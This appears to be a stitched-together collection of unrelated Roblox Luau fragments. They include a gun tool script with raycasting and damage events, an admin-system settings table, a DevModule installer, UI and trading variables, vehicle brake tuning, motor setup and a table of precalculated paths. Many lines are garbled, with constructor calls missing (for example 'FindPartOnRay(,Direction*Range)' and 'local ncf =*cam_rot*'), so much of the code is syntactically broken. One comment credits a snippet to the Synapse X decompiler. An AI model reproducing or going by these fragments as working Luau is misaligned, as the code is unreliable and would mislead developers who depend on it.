local INHERITED = { ["__add"] = true, ["__call"] = true, ["__concat"] = true, ["__div"] = true, ["__le"] = true, ["__lt"] = true, ["__mod"] = true, ["__mul"] = true, ["__pow"] = true, ["__sub"] = true, ["__tostring"] = true, ["__unm"] = true, ["__index"] = false, ["__newindex"] = false, }
local hitPart = script.Parent local debounce = true local tool = game.ServerStorage.SoySauce
--!strict -- StringUtil -- Yuuwa0519 -- 2021-10-28
--[[ Gets the Asset or Bundle info based on the given itemId and itemType. Expects state to be AvatarExperience.Common. ]]
return function(state, itemId, itemType) if itemType == CatalogConstants.ItemType.Asset then local asset = state.Assets[itemId] --print("ItemData:", asset) return asset elseif itemType == CatalogConstants.ItemType.Bundle then local bundle = state.Bundles[itemId] --print("ItemData:", bundle) return bundle end end
--local TEAM = Character:WaitForChild("TEAM")
local VisualizeBullet = script.Parent:WaitForChild("VisualizeBullet") local Module = require(Tool:WaitForChild("Setting")) local GunScript_Server = Tool:WaitForChild("GunScript_Server") local ChangeAmmoAndClip = GunScript_Server:WaitForChild("ChangeAmmoAndClip") local InflictTarget = GunScript_Server:WaitForChild("InflictTarget") local AmmoValue = GunScript_Server:WaitForChild("Ammo") local ClipsValue = GunScript_Server:WaitForChild("Clips") local GUI = script:WaitForChild("GunGUI") local IdleAnim local FireAnim local ReloadAnim local ShotgunClipinAnim local Grip2 local Handle2 local HandleToFire = Handle if Module.DualEnabled then Handle2 = Tool:WaitForChild("Handle2",2) if Handle2 == nil and Module.DualEnabled then error("\"Dual\" setting is enabled but \"Handle2\" is missing!") end end local Equipped = false local Enabled = true local Down = false local Reloading = false local AimDown = false local Ammo = AmmoValue.Value local Clips = ClipsValue.Value local MaxClip = Module.MaxClip local PiercedHumanoid = {} if Module.IdleAnimationID ~= nil or Module.DualEnabled then IdleAnim = Tool:WaitForChild("IdleAnim") IdleAnim = Humanoid:LoadAnimation(IdleAnim) end if Module.FireAnimationID ~= nil then FireAnim = Tool:WaitForChild("FireAnim") FireAnim = Humanoid:LoadAnimation(FireAnim) end if Module.ReloadAnimationID ~= nil then ReloadAnim = Tool:WaitForChild("ReloadAnim") ReloadAnim = Humanoid:LoadAnimation(ReloadAnim) end if Module.ShotgunClipinAnimationID ~= nil then ShotgunClipinAnim = Tool:WaitForChild("ShotgunClipinAnim") ShotgunClipinAnim = Humanoid:LoadAnimation(ShotgunClipinAnim) end function wait(TimeToWait) if TimeToWait ~= nil then local TotalTime = 0 TotalTime = TotalTime + game:GetService("RunService").Heartbeat:wait() while TotalTime < TimeToWait do TotalTime = TotalTime + game:GetService("RunService").Heartbeat:wait() end else game:GetService("RunService").Heartbeat:wait() end end function RayCast(Start,Direction,Range,Ignore) local Hit,EndPos = game.Workspace:FindPartOnRay(,Direction*Range),Ignore) if Hit then if (Hit.Transparency > 0.75 or Hit.Name == "Handle" or Hit.Name == "Effect" or Hit.Name == "Bullet" or Hit.Name == "Laser" or string.lower(Hit.Name) == "water" or Hit.Name == "Rail" or Hit.Name == "Arrow" or (Hit.Parent:FindFirstChild("Humanoid") and Hit.Parent.Humanoid.Health == 0) or (Hit.Parent:FindFirstChild("Humanoid") and Hit.Parent:FindFirstChild("TEAM") and TEAM and Hit.Parent.TEAM.Value == TEAM.Value)) or (Hit.Parent:FindFirstChild("Humanoid") and PiercedHumanoid[Hit.Parent.Humanoid]) then Hit,EndPos = RayCast(EndPos+(Direction*.01),Direction,Range-((Start-EndPos).magnitude),Ignore) end end return Hit,EndPos end function ShakeCamera() if Module.CameraShakingEnabled then local Intensity = Module.Intensity/(AimDown and Module.MouseSensitive or 1) for i = 1, 10 do local cam_rot = Camera.CoordinateFrame - Camera.CoordinateFrame.p local cam_scroll = (Camera.CoordinateFrame.p - Camera.Focus.p).magnitude local ncf =*cam_rot*CFrame.fromEulerAnglesXYZ((-Intensity+(math.random()*(Intensity*2)))/100, (-Intensity+(math.random()*(Intensity*2)))/100, 0) Camera.CoordinateFrame = ncf*, 0, cam_scroll) wait() end end end function Fire(ShootingHandle) local PierceAvailable = Module.Piercing PiercedHumanoid = {} if FireAnim then FireAnim:Play(nil,nil,Module.FireAnimationSpeed) end if not ShootingHandle.FireSound.Playing or not ShootingHandle.FireSound.Looped then ShootingHandle.FireSound:Play() script.Parent.Model.casing:FireServer() end local Start = (Humanoid.Torso.CFrame *,1.5,0)).p--(Handle.CFrame *,Module.MuzzleOffset.Y,Module.MuzzleOffset.Z)).p local Spread = Module.Spread*(AimDown and 1-Module.SpreadRedution or 1) local Direction = (,Mouse.Hit.p) * CFrame.Angles(math.rad(-Spread+(math.random()*(Spread*2))),math.rad(-Spread+(math.random()*(Spread*2))),0)).lookVector while PierceAvailable >= 0 do local Hit,EndPos = RayCast(Start,Direction,5000,Character) if not Module.ExplosiveEnabled then if Hit and Hit.Parent then local TargetHumanoid = Hit.Parent:FindFirstChild("Humanoid") local TargetTorso = Hit.Parent:FindFirstChild("Torso") --local TargetTEAM = Hit.Parent:FindFirstChild("TEAM") if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then --if TargetTEAM and TargetTEAM.Value ~= TEAM.Value then InflictTarget:FireServer(TargetHumanoid, TargetTorso, (Hit.Name == "Head" and Module.HeadshotEnabled) and Module.BaseDamage * Module.HeadshotDamageMultiplier or Module.BaseDamage, Direction, Module.Knockback, Module.Lifesteal, Module.FlamingBullet) PiercedHumanoid[TargetHumanoid] = true --end else PierceAvailable = 0 end end else local Explosion ="Explosion") Explosion.BlastRadius = Module.Radius Explosion.BlastPressure = 0 Explosion.Position = EndPos Explosion.Parent = Workspace.CurrentCamera Explosion.Hit:connect(function(Hit) if Hit and Hit.Parent and Hit.Name == "Torso" then local TargetHumanoid = Hit.Parent:FindFirstChild("Humanoid") local TargetTorso = Hit.Parent:FindFirstChild("Torso") --local TargetTEAM = Hit.Parent:FindFirstChild("TEAM") if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then --if TargetTEAM and TargetTEAM.Value ~= TEAM.Value then InflictTarget:FireServer(TargetHumanoid, TargetTorso, (Hit.Name == "Head" and Module.HeadshotEnabled) and Module.BaseDamage * Module.HeadshotDamageMultiplier or Module.BaseDamage, Direction, Module.Knockback, Module.Lifesteal, Module.FlamingBullet) --end end end end) PierceAvailable = 0 end PierceAvailable = Hit and (PierceAvailable - 1) or -1 script.Parent.BulletVisualizerScript.Visualize:Fire(nil,ShootingHandle, Module.MuzzleOffset, EndPos, script.MuzzleEffect, script.HitEffect, Module.HitSoundIDs[math.random(1,#Module.HitSoundIDs)], {Module.ExplosiveEnabled,Module.BlastRadius,Module.BlastPressure}, {Module.BulletSpeed,Module.BulletSize,Module.BulletColor,Module.BulletTransparency,Module.BulletMaterial,Module.FadeTime}, false, PierceAvailable == -1 and Module.VisualizerEnabled or false) script.Parent.VisualizeBullet:FireServer(ShootingHandle, Module.MuzzleOffset, EndPos, script.MuzzleEffect, script.HitEffect, Module.HitSoundIDs[math.random(1,#Module.HitSoundIDs)], {Module.ExplosiveEnabled,Module.BlastRadius,Module.BlastPressure}, {Module.BulletSpeed,Module.BulletSize,Module.BulletColor,Module.BulletTransparency,Module.BulletMaterial,Module.FadeTime}, true, PierceAvailable == -1 and Module.VisualizerEnabled or false) Start = EndPos + (Direction*0.01) end end function Reload() if Enabled and not Reloading and (Clips > 0 or not Module.LimitedClipEnabled) and Ammo < Module.AmmoPerClip then Reloading = true if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end UpdateGUI() if Module.ShotgunReload then for i = 1,(Module.AmmoPerClip - Ammo) do if ShotgunClipinAnim then ShotgunClipinAnim:Play(nil,nil,Module.ShotgunClipinAnimationSpeed) end Handle.ShotgunClipin:Play() wait(Module.ShellClipinSpeed) end end if ReloadAnim then ReloadAnim:Play(nil,nil,Module.ReloadAnimationSpeed) end Handle.ReloadSound:Play() script.Parent.Model.reload:FireServer() wait(Module.ReloadTime) if Module.LimitedClipEnabled then Clips = Clips - 1 end Ammo = Module.AmmoPerClip ChangeAmmoAndClip:FireServer(Ammo,Clips) Reloading = false UpdateGUI() end end function UpdateGUI() GUI.Frame.Ammo.Fill:TweenSizeAndPosition(,0,1,0),,0,0,0), Enum.EasingDirection.Out, Enum.EasingStyle.Quint, 0.25, true) GUI.Frame.Clips.Fill:TweenSizeAndPosition(,0,1,0),,0,0,0), Enum.EasingDirection.Out, Enum.EasingStyle.Quint, 0.25, true) GUI.Frame.Ammo.Current.Text = Ammo GUI.Frame.Ammo.Max.Text = Module.AmmoPerClip GUI.Frame.Clips.Current.Text = Clips GUI.Frame.Clips.Max.Text = Module.MaxClip GUI.Frame.Ammo.Current.Visible = not Reloading GUI.Frame.Ammo.Max.Visible = not Reloading GUI.Frame.Ammo.Frame.Visible = not Reloading GUI.Frame.Ammo.Reloading.Visible = Reloading GUI.Frame.Clips.Current.Visible = not (Clips <= 0) GUI.Frame.Clips.Max.Visible = not (Clips <= 0) GUI.Frame.Clips.Frame.Visible = not (Clips <= 0) GUI.Frame.Clips.NoMoreClip.Visible = (Clips <= 0) GUI.Frame.Clips.Visible = Module.LimitedClipEnabled GUI.Frame.Size = Module.LimitedClipEnabled and,250,0,100) or,250,0,55) GUI.Frame.Position = Module.LimitedClipEnabled and,-260,1,-110)or,-260,1,-65) end Mouse.Button1Down:connect(function() Down = true local IsChargedShot = false if Equipped and Enabled and Down and not Reloading and Ammo > 0 and Humanoid.Health > 0 then Enabled = false if Module.ChargedShotEnabled then if HandleToFire:FindFirstChild("ChargeSound") then HandleToFire.ChargeSound:Play() end wait(Module.ChargingTime) IsChargedShot = true end if Module.MinigunEnabled then if HandleToFire:FindFirstChild("WindUp") then HandleToFire.WindUp:Play() end wait(Module.DelayBeforeFiring) end while Equipped and not Reloading and (Down or IsChargedShot) and Ammo > 0 and Humanoid.Health > 0 do IsChargedShot = false for i = 1,(Module.BurstFireEnabled and Module.BulletPerBurst or 1) do Spawn(ShakeCamera) for x = 1,(Module.ShotgunEnabled and Module.BulletPerShot or 1) do Fire(HandleToFire) end Ammo = Ammo - 1 ChangeAmmoAndClip:FireServer(Ammo,Clips) UpdateGUI() if Module.BurstFireEnabled then wait(Module.BurstRate) end if Ammo <= 0 then break end end HandleToFire = (HandleToFire == Handle and Module.DualEnabled) and Handle2 or Handle wait(Module.FireRate) if not Module.Auto then break end end if HandleToFire.FireSound.Playing and HandleToFire.FireSound.Looped then HandleToFire.FireSound:Stop() end if Module.MinigunEnabled then if HandleToFire:FindFirstChild("WindDown") then HandleToFire.WindDown:Play() end wait(Module.DelayAfterFiring) end Enabled = true if Ammo <= 0 then Reload() end end end) Mouse.Button1Up:connect(function() Down = false end) ChangeAmmoAndClip.OnClientEvent:connect(function(ChangedAmmo,ChangedClips) Ammo = ChangedAmmo Clips = ChangedClips UpdateGUI() end) Tool.Equipped:connect(function(TempMouse) Equipped = true UpdateGUI() if Module.AmmoPerClip ~= math.huge then GUI.Parent = Player.PlayerGui end TempMouse.Icon = "rbxassetid://"..Module.MouseIconID if IdleAnim then IdleAnim:Play(nil,nil,Module.IdleAnimationSpeed) end TempMouse.KeyDown:connect(function(Key) if string.lower(Key) == "r" then Reload() elseif string.lower(Key) == "e" then if not Reloading and AimDown == false and Module.SniperEnabled then Workspace.CurrentCamera.FieldOfView = Module.FieldOfView --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") or Tool.ZoomGui:Clone() GUI.Parent = game.Players.LocalPlayer.PlayerGui]] GUI.Scope.Visible = true game.Players.LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson script["Mouse Sensitivity"].Disabled = false AimDown = true Mouse.Icon="" else Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end end end) if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = false local LeftArm = Tool.Parent:FindFirstChild("Left Arm") local RightArm = Tool.Parent:FindFirstChild("Right Arm") if RightArm then local Grip = RightArm:WaitForChild("RightGrip",0.01) if Grip then Grip2 = Grip:Clone() Grip2.Name = "LeftGrip" Grip2.Part0 = LeftArm Grip2.Part1 = Handle2 --Grip2.C1 = Grip2.C1:inverse() Grip2.Parent = LeftArm end end end end) Tool.Unequipped:connect(function() Equipped = false GUI.Parent = script if IdleAnim then IdleAnim:Stop() end if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = true if Grip2 then Grip2:Destroy() end end end) Humanoid.Died:connect(function() Equipped = false GUI.Parent = script if IdleAnim then IdleAnim:Stop() end if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end if Module.DualEnabled and not Workspace.FilteringEnabled then Handle2.CanCollide = true if Grip2 then Grip2:Destroy() end end end)
-- Decompiled with the Synapse X Luau decompiler.
return { Crouch = "rbxassetid://9876150092", Default = "rbxassetid://9876149963" };
--// GUI Variables
local PlayerGUI = Player:WaitForChild("PlayerGui") local MainUI = PlayerGUI:WaitForChild("MainUI") local TradingPlayerListUI = MainUI.TradePlayerList local TradePlayerListHolder = TradingPlayerListUI.List.Holder local ScrollingFrame = TradePlayerListHolder local UIGridLayout = ScrollingFrame.UIGridLayout local TradeMenuUI = MainUI.TradeFrame local getSizes = function() return, 0.05),, 0.2), 1 end local getPetSizes = function() return, 0.04),, 0.25), 2 end
--[[ Unpacks an animatable type into an array of numbers. If the type is not animatable, an empty array will be returned. FIXME: This function uses a lot of redefinitions to suppress false positives from the Luau typechecker - ideally these wouldn't be required FUTURE: When Luau supports singleton types, those could be used in conjunction with intersection types to make this function fully statically type checkable. ]]
local Oklab = require(script.Parent.Parent.Parent.Colour.Oklab) local function unpackType(value, typeString: string): {number} if typeString == "number" then local value = value :: number return {value} elseif typeString == "CFrame" then -- FUTURE: is there a better way of doing this? doing distance -- calculations on `angle` may be incorrect local axis, angle = value:ToAxisAngle() return {value.X, value.Y, value.Z, axis.X, axis.Y, axis.Z, angle} elseif typeString == "Color3" then local lab = return {lab.X, lab.Y, lab.Z} elseif typeString == "ColorSequenceKeypoint" then local lab = return {lab.X, lab.Y, lab.Z, value.Time} elseif typeString == "DateTime" then return {value.UnixTimestampMillis} elseif typeString == "NumberRange" then return {value.Min, value.Max} elseif typeString == "NumberSequenceKeypoint" then return {value.Value, value.Time, value.Envelope} elseif typeString == "PhysicalProperties" then return {value.Density, value.Friction, value.Elasticity, value.FrictionWeight, value.ElasticityWeight} elseif typeString == "Ray" then return {value.Origin.X, value.Origin.Y, value.Origin.Z, value.Direction.X, value.Direction.Y, value.Direction.Z} elseif typeString == "Rect" then return {value.Min.X, value.Min.Y, value.Max.X, value.Max.Y} elseif typeString == "Region3" then -- FUTURE: support rotated Region3s if/when they become constructable return { value.CFrame.X, value.CFrame.Y, value.CFrame.Z, value.Size.X, value.Size.Y, value.Size.Z } elseif typeString == "Region3int16" then return {value.Min.X, value.Min.Y, value.Min.Z, value.Max.X, value.Max.Y, value.Max.Z} elseif typeString == "UDim" then return {value.Scale, value.Offset} elseif typeString == "UDim2" then return {value.X.Scale, value.X.Offset, value.Y.Scale, value.Y.Offset} elseif typeString == "Vector2" then return {value.X, value.Y} elseif typeString == "Vector2int16" then return {value.X, value.Y} elseif typeString == "Vector3" then return {value.X, value.Y, value.Z} elseif typeString == "Vector3int16" then return {value.X, value.Y, value.Z} else return {} end end return unpackType
-- Ensures that all scripts included with a DevModule are marked as Disabled. -- This makes sure there are no race conditions resulting in the Install script -- running after the scripts included with the module.
local function assertScriptsAreDisabled(devModuleScripts: { Script | LocalScript }) local enabledScripts = {} for _, devModuleScript in ipairs(devModuleScripts) do if not devModuleScript.Disabled then table.insert(enabledScripts, devModuleScript.Name) end end if #enabledScripts > 0 then error(constants.ENABLED_SCRIPTS_ERROR:format(table.concat(enabledScripts, ", "))) end end type Options = { dataModel: Instance, verboseLogging: boolean, pruneDevelopmentFiles: boolean } local defaultOptions: Options = { dataModel = game, verboseLogging = false, pruneDevelopmentFiles = true, } local function install(devModule: Instance, options: Options) local mergedOptions = defaultOptions for key, value in pairs(options or {}) do mergedOptions[key] = value end options = mergedOptions if options.verboseLogging then useVerboseLogging = options.verboseLogging end local devModuleType = typeof(devModule) assert(devModuleType == "Instance", ("expected a DevModule to install, got %s"):format(devModuleType)) events.started:Fire() log("info", ("Installing %s from %s..."):format(devModule.Name, devModule.Parent.Name)) local devModuleScripts = getDevModuleScripts(devModule) assertScriptsAreDisabled(devModuleScripts) if constants.DEV_MODULE_STORAGE:FindFirstChild(devModule.Name) then log("info", "A version of this DevModule already exists. Skipping...") devModule:Destroy() return end if options.pruneDevelopmentFiles then log("info", "Pruning development files...") prune(devModule) end -- The `true` flag searches all descendants of an instance, which is needed -- here since the Packages folder is nested. local packages = devModule:FindFirstChild(constants.PACKAGE_NAME, true) if packages then log("info", "Linking packages...") dedupePackages(packages) end log("info", "Overlaying services...") for _, child in ipairs(devModule:GetChildren()) do -- GetService errors if the given name is not a service so we wrap it in -- a pcall to use the result in a conditional. local success, service = pcall(function() return game:GetService(child.Name) end) if success then overlay(child, service) end end log("info", "Enabling scripts...") for _, devModuleScript in ipairs(devModuleScripts) do devModuleScript.Disabled = false log("info", ("Enabled %s"):format(devModuleScript.Name)) end events.finished:Fire() log("info", ("Safe to remove %s"):format(devModule:GetFullName())) log("info", ("Removing %s..."):format(devModule:GetFullName())) devModule:Destroy() log("info", ("Successfully installed %s!"):format(devModule.Name)) end return install
-- Water off
faucet.WaterOffSet.Interactive.ClickDetector.MouseClick:Connect(function() faucet.Handle:SetPrimaryPartCFrame(faucet.HandleBase.CFrame) if steam.WarmSteam.Enabled == true then steam.WarmSteam.Enabled = false end if steam.HotSteam.Enabled == true then steam.HotSteam.Enabled = false end p.HotOn.Value = false p.ColdOn.Value = false end)
--------------| SYSTEM SETTINGS |--------------
Prefix = ";"; -- The character you use before every command (e.g. ';jump me'). SplitKey = " "; -- The character inbetween command arguments (e.g. setting it to '/' would change ';jump me' to ';jump/me'). BatchKey = ""; -- The character inbetween batch commands (e.g. setting it to '|' would change ';jump me ;fire me ;smoke me' to ';jump me | ;fire me | ;smoke me' QualifierBatchKey = ","; -- The character used to split up qualifiers (e.g. ;jump player1,player2,player3) Theme = "Blue"; -- The default UI theme. NoticeSoundId = 2865227271; -- The SoundId for notices. NoticeVolume = 0.1; -- The Volume for notices. NoticePitch = 1; -- The Pitch/PlaybackSpeed for notices. ErrorSoundId = 2865228021; -- The SoundId for error notifications. ErrorVolume = 0.1; -- The Volume for error notifications. ErrorPitch = 1; -- The Pitch/PlaybackSpeed for error notifications. AlertSoundId = 3140355872; -- The SoundId for alerts. AlertVolume = 0.5; -- The Volume for alerts. AlertPitch = 1; -- The Pitch/PlaybackSpeed for alerts. WelcomeBadgeId = 0; -- Award new players a badge, such as 'Welcome to the game!'. Set to 0 for no badge. CommandDebounce = true; -- Wait until the command effect is over to use again. Helps to limit abuse & lag. Set to 'false' to disable. SaveRank = true; -- Saves a player's rank in the server they received it. (e.g. ;rank plrName rank). Use ';permRank plrName rank' to permanently save a rank. Set to 'false' to disable. LoopCommands = 3; -- The minimum rank required to use LoopCommands. MusicList = {505757009,}; -- Songs which automatically appear in a user's radio. Type '!radio' to display the radio. ThemeColors = { -- The colours players can set their HD Admin UI (in the 'Settings' menu). | Format: {ThemeName, ThemeColor3Value}; {"Red", Color3.fromRGB(150, 0, 0), }; {"Orange", Color3.fromRGB(150, 75, 0), }; {"Brown", Color3.fromRGB(120, 80, 30), }; {"Yellow", Color3.fromRGB(130, 120, 0), }; {"Green", Color3.fromRGB(0, 120, 0), }; {"Blue", Color3.fromRGB(0, 100, 150), }; {"Purple", Color3.fromRGB(100, 0, 150), }; {"Pink", Color3.fromRGB(150, 0, 100), }; {"Black", Color3.fromRGB(60, 60, 60), }; }; Colors = { -- The colours for ChatColors and command arguments. | Format: {"ShortName", "FullName", Color3Value}; {"r", "Red", Color3.fromRGB(255, 0, 0) }; {"o", "Orange", Color3.fromRGB(250, 100, 0) }; {"y", "Yellow", Color3.fromRGB(255, 255, 0) }; {"g", "Green" , Color3.fromRGB(0, 255, 0) }; {"dg", "DarkGreen" , Color3.fromRGB(0, 125, 0) }; {"b", "Blue", Color3.fromRGB(0, 255, 255) }; {"db", "DarkBlue", Color3.fromRGB(0, 50, 255) }; {"p", "Purple", Color3.fromRGB(150, 0, 255) }; {"pk", "Pink", Color3.fromRGB(255, 85, 185) }; {"bk", "Black", Color3.fromRGB(0, 0, 0) }; {"w", "White", Color3.fromRGB(255, 255, 255) }; }; ChatColors = { -- The colour a player's chat will appear depending on their rank. '["Owner"] = "Yellow";' makes the owner's chat yellow. [5] = "Yellow"; }; Cmdbar = 1; -- The minimum rank required to use the Cmdbar. Cmdbar2 = 3; -- The minimum rank required to use the Cmdbar2. ViewBanland = 3; -- The minimum rank required to view the banland. OnlyShowUsableCommands = false; -- Only display commands equal to or below the user's rank on the Commands page. RankRequiredToViewPage = { -- || The pages on the main menu || ["Commands"] = 0; ["Admin"] = 0; ["Settings"] = 0; }; RankRequiredToViewRank = { -- || The rank categories on the 'Ranks' subPage under Admin || ["Owner"] = 0; ["HeadAdmin"] = 0; ["Admin"] = 0; ["Mod"] = 0; ["VIP"] = 0; }; RankRequiredToViewRankType = { -- || The collection of loader-rank-rewarders on the 'Ranks' subPage under Admin || ["Owner"] = 0; ["SpecificUsers"] = 5; ["Gamepasses"] = 0; ["Assets"] = 0; ["Groups"] = 0; ["Friends"] = 0; ["FreeAdmin"] = 0; ["VipServerOwner"] = 0; }; WelcomeRankNotice = true; -- The 'You're a [rankName]' notice that appears when you join the game. Set to false to disable. WelcomeDonorNotice = true; -- The 'You're a Donor' notice that appears when you join the game. Set to false to disable. WarnIncorrectPrefix = true; -- Warn the user if using the wrong prefix | "Invalid prefix! Try using [correctPrefix][commandName] instead!" DisableAllNotices = false; -- Set to true to disable all HD Admin notices. ScaleLimit = 4; -- The maximum size players with a rank lower than 'IgnoreScaleLimit' can scale theirself. For example, players will be limited to ;size me 4 (if limit is 4) - any number above is blocked. IgnoreScaleLimit = 3; -- Any ranks equal or above this value will ignore 'ScaleLimit' VIPServerCommandBlacklist = {"permRank", "permBan", "globalAnnouncement"}; -- Commands players are probihited from using in VIP Servers. GearBlacklist = {67798397}; -- The IDs of gear items to block when using the ;gear command. IgnoreGearBlacklist = 4; -- The minimum rank required to ignore the gear blacklist. PlayerDataStoreVersion = "V1.0"; -- Data about the player (i.e. permRanks, custom settings, etc). Changing the Version name will reset all PlayerData. SystemDataStoreVersion = "V1.0"; -- Data about the game (i.e. the banland, universal message system, etc). Changing the Version name will reset all SystemData. CoreNotices = { -- Modify core notices. You can find a table of all CoreNotices under [MainModule > Client > SharedModules > CoreNotices] --NoticeName = NoticeDetails; };
--//roof motors
local s1 ="Motor",script.Parent.Parent.Misc.s1.SS) s1.MaxVelocity = 0.03 s1.Part0 = script.Parent.Parent.Misc.s2.s1 s1.Part1 = s1.Parent local s2 ="Motor",script.Parent.Parent.Misc.s2.SS) s2.MaxVelocity = 0.007 s2.Part0 = script.Parent.s2 s2.Part1 = s2.Parent local s3 ="Motor",script.Parent.Parent.Misc.s3.SS) s3.MaxVelocity = 0.01 s3.Part0 = script.Parent.Parent.Misc.s2.s3 s3.Part1 = s3.Parent local b1 ="Motor",script.Parent.Parent.Misc.b1.SS) b1.MaxVelocity = 0.01 b1.Part0 = script.Parent.b1 b1.Part1 = b1.Parent
--[[ @class BlendSingle.story ]]
local require = require(game:GetService("ServerScriptService"):FindFirstChild("LoaderUtils", true).Parent).load(script) local Maid = require("Maid") local Observable = require("Observable") local Blend = require("Blend") return function(target) local maid = local state = Blend.State("a") local result = Blend.Single(Blend.Dynamic(state, function(text) return Blend.New "TextLabel" { Parent = target; Text = text; Size =, 0, 1, 0); BackgroundTransparency = 0.5; [function() return local internal = print("Made for", text) internal:GiveTask(function() print("Cleaning up", text) end) return internal end) end] = true; } end)) maid:GiveTask(result:Subscribe()) state.Value = "b" return function() maid:DoCleaning() end end
Tune.ABSEnabled = true -- Implements ABS Tune.ABSThreshold = 20 -- Slip speed allowed before ABS starts working (in SPS) Tune.BrakeForce = 2500 -- Total brake force (LuaInt) Tune.BrakeBias = .57 -- Brake bias towards the front, percentage (1 = Front, 0 = Rear, .5 = 50/50) Tune.PBrakeForce = 5000 -- Handbrake force Tune.PBrakeBias = .57 -- Handbrake bias towards the front, percentage (1 = Front, 0 = Rear, .5 = 50/50) Tune.EBrakeForce = 250 -- Engine braking force at redline
-- Pull maps from MapWorkspace.
for i, map in ipairs(workspace.MapWorkspace:GetChildren()) do InstallMap(map) end
--Precalculated paths
local t,f,n=true,false,{} local r={ [58]={{20,58},t}, [49]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49},t}, [16]={n,f}, [19]={{20,19},t}, [59]={{20,58,56,30,41,59},t}, [63]={{20,63},t}, [34]={{20,58,56,30,41,39,35,34},t}, [21]={{20,21},t}, [48]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48},t}, [27]={{20,58,56,30,41,39,35,34,32,31,29,28,27},t}, [14]={n,f}, [31]={{20,58,56,30,41,39,35,34,32,31},t}, [56]={{20,58,56},t}, [29]={{20,58,56,30,41,39,35,34,32,31,29},t}, [13]={n,f}, [47]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47},t}, [12]={n,f}, [45]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45},t}, [57]={{20,58,57},t}, [36]={{20,58,56,30,41,39,35,37,36},t}, [25]={{20,58,56,30,41,39,35,34,32,31,29,28,27,26,25},t}, [71]={{20,58,56,30,41,59,61,71},t}, [20]={{20},t}, [60]={{20,58,56,30,41,60},t}, [8]={n,f}, [4]={n,f}, [75]={{20,58,56,30,41,59,61,71,72,76,73,75},t}, [22]={{20,21,22},t}, [74]={{20,58,56,30,41,59,61,71,72,76,73,74},t}, [62]={{20,62},t}, [1]={n,f}, [6]={n,f}, [11]={n,f}, [15]={n,f}, [37]={{20,58,56,30,41,39,35,37},t}, [2]={n,f}, [35]={{20,58,56,30,41,39,35},t}, [53]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,52,53},t}, [73]={{20,58,56,30,41,59,61,71,72,76,73},t}, [72]={{20,58,56,30,41,59,61,71,72},t}, [33]={{20,58,56,30,41,39,35,37,36,33},t}, [69]={{20,58,56,30,41,60,69},t}, [65]={{20,19,66,64,65},t}, [26]={{20,58,56,30,41,39,35,34,32,31,29,28,27,26},t}, [68]={{20,19,66,64,67,68},t}, [76]={{20,58,56,30,41,59,61,71,72,76},t}, [50]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,50},t}, [66]={{20,19,66},t}, [10]={n,f}, [24]={{20,58,56,30,41,39,35,34,32,31,29,28,27,26,25,24},t}, [23]={{20,58,23},t}, [44]={{20,58,56,30,41,39,35,34,32,31,29,28,44},t}, [39]={{20,58,56,30,41,39},t}, [32]={{20,58,56,30,41,39,35,34,32},t}, [3]={n,f}, [30]={{20,58,56,30},t}, [51]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,50,51},t}, [18]={n,f}, [67]={{20,19,66,64,67},t}, [61]={{20,58,56,30,41,59,61},t}, [55]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,52,53,54,55},t}, [46]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,46},t}, [42]={{20,58,56,30,41,39,40,38,42},t}, [40]={{20,58,56,30,41,39,40},t}, [52]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,52},t}, [54]={{20,58,56,30,41,39,35,34,32,31,29,28,44,45,49,48,47,52,53,54},t}, [43]={n,f}, [7]={n,f}, [9]={n,f}, [41]={{20,58,56,30,41},t}, [17]={n,f}, [38]={{20,58,56,30,41,39,40,38},t}, [28]={{20,58,56,30,41,39,35,34,32,31,29,28},t}, [5]={n,f}, [64]={{20,19,66,64},t}, } return r
-- Dont Touch Any Of The Text Below This Green Line --
